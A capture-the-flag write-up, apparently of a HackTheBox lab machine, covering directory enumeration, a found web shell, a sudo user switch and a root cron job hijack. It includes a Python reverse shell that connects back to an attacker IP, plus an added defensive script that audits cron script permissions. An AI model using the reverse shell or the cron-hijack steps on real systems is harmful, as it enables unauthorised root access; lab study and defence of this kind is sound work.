
### Port Scanning, General Enumeration and Access (Nmap, Gobuster)
Initial scan showed that the only port available is 80 (HTTP).


Looks like a pretty neat tool, but not a lot to go on.

`gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php`

`/dev`?

Found the phpbash thing!


---
### Privesc (php reverse shell, python, cronjobs)
We can upload files to the `/uploads` directory in the webroot.

Let's get a real shell.

`python3 -c 'import pty; pty.spawn("/bin/bash")'`

Easy enough to switch to `scriptmanager`:

`sudo -u scriptmanager /bin/bash`

There's a scripts folder owned by `scriptmanager`.


Interesting, the Python script is ours but the text file is owned by root?

I see, so the script runs and creates that file.

Moving the old `test.txt` to `test.txt.bak` and re-running the script, we can see that the new `test.txt` is owned by us. That leads me to believe that something with root privs ran that prior. Maybe a cronjob? Let's test.

It's back and with root privs!

Let's give this boring old `test.py` some fangs.
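```python
import socket, subprocess, os, pty

# Connect back to the listener on the attacking machine
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.18", 4445))
# Point stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Spawn an interactive shell over the connection
pty.spawn("/bin/bash")
```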
I created the new `test.py` on my machine and transferred it over. Started a listener and...
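
Seen from the defender's side, the condition this box relies on is a root-run job executing a script that sits in a directory a lower-privileged account owns. The following is an added example (not part of the original writeup): an audit that walks a script path and reports every component a non-root user could modify. The function name `audit_cron_target` and the paths passed to it are assumptions.

```python
import os
import stat
import sys


def audit_cron_target(script, trusted_uids=(0,), stop="/"):
    """Return (path, reason) findings for a script run by a privileged job.

    Checks the script and each parent directory up to `stop`: anyone who can
    write to one of them can replace what the job executes.
    """
    findings = []
    path = os.path.realpath(script)   # resolve symlinks before checking
    stop = os.path.realpath(stop)
    while True:
        st = os.stat(path)
        if st.st_uid not in trusted_uids:
            findings.append((path, "owned by uid %d" % st.st_uid))
        if st.st_mode & stat.S_IWGRP:
            findings.append((path, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        parent = os.path.dirname(path)
        if path == stop or parent == path:
            break
        path = parent
    return findings


if __name__ == "__main__":
    # Pass the script paths referenced by root's cron entries as arguments.
    for target in sys.argv[1:]:
        for path, reason in audit_cron_target(target):
            print("%s: %s (%s)" % (target, path, reason))
```

Any finding on a path that root's crontab executes means the job should be moved to a root-owned, non-writable location or run as the unprivileged owner instead.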


---
Tags: #gobuster #htb #cron #python #hackthebox #box_writeups